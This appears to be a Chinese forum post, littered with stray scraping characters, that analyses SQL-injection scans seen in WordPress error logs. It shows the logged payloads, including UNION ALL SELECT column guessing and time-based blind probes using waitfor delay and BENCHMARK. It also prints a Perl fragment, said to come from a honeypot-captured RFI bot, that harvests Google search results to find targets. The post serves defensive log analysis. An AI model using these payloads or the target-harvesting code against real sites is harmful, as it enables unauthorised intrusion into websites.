0 B/ D' A) e1 S% p/ z" h@ini_set('log_errors','On'); @ini_set('display_errors','Off'); @ini_set('error_log','/home/example.com/logs/php_error.log');SQL 注入扫描; _3 M; D$ ?1 B$ ?( ] u
. {2 c; j' s- F6 _$ z% P[07-Dec-2012 02:40:49] WordPress database error You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'WHERE id = -1\'' at line 1 for query SELECT text, author_id, date FROM WHERE id = -1\' % E5 M( b; t1 j0 z[07-Dec-2012 02:40:50] WordPress database error You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'WHERE id = 999999.9 UNION ALL SELECT 0x31303235343830303536--' at line 1 for query SELECT text, author_id, date FROM WHERE id = 999999.9 UNION ALL SELECT 0x31303235343830303536--: ^) o! u8 d; }1 s
[07-Dec-2012 02:40:53] WordPress database error You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'WHERE id = 999999.9 UNION ALL SELECT 0x31303235343830303536,0x313032353438303035' at line 1 for query SELECT text, author_id, date FROM WHERE id = 999999.9 UNION ALL SELECT 0x31303235343830303536,0x31303235343830303536--0 A8 B& [& n! G, x, ?3 G6 d
上面的日志就是在暴力猜解表的列数,那个巨大的十六进制值会被解析成null。 1 Q, c2 i0 C0 p5 T- B. m
SQL盲注扫描5 Z! b9 \. ~) r. ^4 h' v( Q& P/ n2 Z
攻击者使用了类似"waitfor delay"和"benchmark"这样的函数来盲注。 8 S# w c. ?! U' [7 }; r( H9 f" }1 W
[07-Dec-2012 02:43:21] WordPress database error You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'WHERE id = -1; if (1=1) waitfor delay \'00:00:05\'--' at line 1 for query SELECT text, author_id, date FROM WHERE id = -1; if (1=1) waitfor delay \'00:00:05\'-- 2 M3 Q- [! Q0 F7 t# E[07-Dec-2012 02:43:27] WordPress database error You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'WHERE id = -1 and if(1=1,BENCHMARK(8623333,MD5(0x41)),0)' at line 1 for query SELECT text, author_id, date FROM WHERE id = -1 and if(1=1,BENCHMARK(8623333,MD5(0x41)),0)3 Q% [5 b9 U/ Z5 V7 X4 r0 C* t
Google一下大规模扫描" m: n3 G; ~+ ^- {) ^* c
i: C2 b+ g# |) @0 j4 H: A( Z; `; P
$ q6 u& v' ?' S5 f6 X, E
[attach]163[/attach]) y2 y2 i7 g# s8 a1 P& W
" V- o% H" m. ~4 l; o
( q% F5 o' Q" b4 Y' A& ]3 t$ [: h
7 A" t$ c0 e% `+ T9 [
僵尸网络控制着可能使用被感染主机来识别潜在的目标。下面是该公司的蜜罐捕获到的一个RFI(远程文件包含)攻击代码里的片段:
sub google() { my @list; my $key = $_[0]; for (my $i=0; $i<=400; $i+=10){ my $search = ("http://www.google.com/search?q=".&key($key)."&num=100&filter=0&start=".$i); my $res = &search_engine_query($search); while ($res =~ m/<a href="\"?http:\/\/([^">\"]*)\//g) { if ($1 !~ /google/){ my $link = $1; my @grep = &links($link); push(@list,@grep); } } } return @list;7 d+ c: F( f% D- J